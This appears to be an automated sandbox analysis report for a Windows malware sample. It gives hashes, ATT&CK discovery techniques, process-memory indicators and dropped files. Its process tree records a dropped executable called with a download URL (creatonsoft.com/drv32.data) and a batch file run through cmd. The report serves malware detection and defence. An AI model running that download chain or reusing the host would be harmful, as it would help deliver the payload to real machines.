55379b0f04deadfa850caad6bbe22ef833adac58fa4f7ad61fcdb31d72a050bb

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19-09-2024 06:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe
Size

97KB
MD5

eac64ed3a56ed6bfaebfa847736b9c8b
SHA1

d606de34808b88b4975d0c28d7faa1f9c9d8e912
SHA256

55379b0f04deadfa850caad6bbe22ef833adac58fa4f7ad61fcdb31d72a050bb
SHA512

1186668a43561739692de08c933b3fe2aec3745f03c87e5a8f90831d69d6f02be04617e5961ed2e9ceb91b00528d8f1d325a3f426813cd67d526847c6786205a
SSDEEP

1536:pu3dzAzeIGy7bJ3GkZSnUgidUbarSu2A184HlkL6XgsAuryTUgXuHAQc1zCXdW:puNzePR3romdzH1XgU1gXQAqs

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2480	GD135-tmp.exe

Loads dropped DLL 1 IoCs

pid	Process
2376	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GD135-tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2376 wrote to memory of 2480	2376	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	31
PID 2376 wrote to memory of 2480	2376	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	31
PID 2376 wrote to memory of 2480	2376	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	31
PID 2376 wrote to memory of 2480	2376	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	31
PID 2376 wrote to memory of 2632	2376	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	33
PID 2376 wrote to memory of 2632	2376	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	33
PID 2376 wrote to memory of 2632	2376	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	33
PID 2376 wrote to memory of 2632	2376	eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe	33

C:\Users\Admin\AppData\Local\Temp\eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\eac64ed3a56ed6bfaebfa847736b9c8b_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2376
- C:\Users\Admin\AppData\Local\Temp\GD135-tmp.exe
  C:\Users\Admin\AppData\Local\Temp\GD135-tmp.exe http://creatonsoft.com/drv32.data "C:\Users\Admin\AppData\Local\Temp\GD136-tmp"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\tmp.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PLSLTMYI\LF4SNUJG.htm

Filesize
1.6MB

MD5
ed702ac285ca1065d96bbba08d718385

SHA1
c2f3808c6321a03201b884da3d50099ec929c1ec

SHA256
8baae1e64c6f0d3c158432352e9bcd6c756b2b06ab95170c7d1b6271e737f31a

SHA512
32dfa3a5445fd4b91f12a6f5a9079ee55dc05cea7ffb02d9d7d970735535888f9a1c3a0bfcf1a7b83e16c79cf1d1100e29c2e8e450008689f70f4caf3cecc3b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\GD135-tmp

Filesize
104KB

MD5
53c0d4521d6e9cf8712824d577f8fb92

SHA1
a788a8b06061d46d8ea391028bd918e8ef5a744a

SHA256
ce37879a283050b4c482ae7a4071eb4633a55851e1f527716f482f88c976ba93

SHA512
4f3827e6182791bba8301024f16e146e3b0d597228c5b25cecd05be7684c55d72ebd1e4e8cd3a958b49eadacf77f8c0dadcd9306e84b33074942f907daaaf5b7

Download Submit
C:\tmp.bat

Filesize
50B

MD5
e4952cf99e6611329ed79aa28f8b0f53

SHA1
9f79573857316ea78c1b00357ef5d18c1c872e7b

SHA256
6d4d33411223ef29e284098104c68867c958f473e99d9d96516ae54d8c2f512b

SHA512
cb2f60c3d1612394ed8f6d5db2b0c593c8f3922798fe8d2a899da156826e8a8fc8fb99449ce3f17cd8a879c0e78f2ea886c298ff9e9baf3d77a003a17c6de7a0

Download Submit
memory/2376-0-0x0000000000400000-0x0000000000461000-memory.dmp

Filesize
388KB

Download
memory/2376-45-0x0000000000400000-0x0000000000461000-memory.dmp

Filesize
388KB

Download
memory/2480-33-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download